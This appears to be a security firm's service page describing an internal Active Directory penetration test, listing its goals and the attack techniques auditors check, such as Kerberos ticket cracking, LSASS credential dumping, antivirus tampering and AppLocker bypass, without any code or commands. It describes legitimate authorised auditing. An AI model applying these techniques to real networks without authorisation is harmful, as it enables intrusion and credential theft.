Security Audit - AD
FIREWALL
An internal penetration test in a Windows environment consists of simulating the actions of an attacker having access to the corporate network, this access can be physical or through an infected workstation. The objectives of this type of test are multiple:
List the technical vulnerabilities affecting the perimeter and analyze their impact
Take control of the Active Directory domain
List the methods of remote access persistence and data exfiltration to the internet
Issue an action plan to improve the level of security
Here are some examples of points verified by our auditors during this type of service :
Active Directory
Network
Passive listening to authentication requests
MITM attacks to collect identifiers
Enumeration and scan of in the domain's servers
Retrieving the content of the SYSVOL share and searching for information in the GPOs and scripts
Search for anonymously accessible file shares
List of accounts
Replay of identifiers coming from stolen databases exposed on the Internet
Search for identifiers in the metadata of files published on the Internet
Collection of Active Directory groups and users from spoofed accounts
Bruteforce of domain accounts and local server accounts
Kerberos
Retrieving the list of Service Principal Names
Attempt to decipher TGS and ASREP
Exploiting dangerous Kerberos delegation
Domain
Identification of domain controllers
Search for vulnerabilities on domain controllers
Exploitation of dangerous ACLs
Analysis of trust relationships
Windows servers and clients
Updates
Exploitation of the absence of a patch on the system
Exploitation of the absence of a patch on the installed software
Search for software vulnerabilities on the services provided by the servers
Bypassing Microsoft protections
UAC
SRP
AppLocker
Accounts and passwords
List of identifiers and brute force of local accounts
List of service accounts and scheduled tasks
Retrieving authentication traces in the memory of the LSASS process
Password collection and cracking of high privilege accounts
Various
Retrieving authentication data within scripts
Attacking the antivirus (forced shutdown, addition of exception, etc.)
Malicious USB media insertion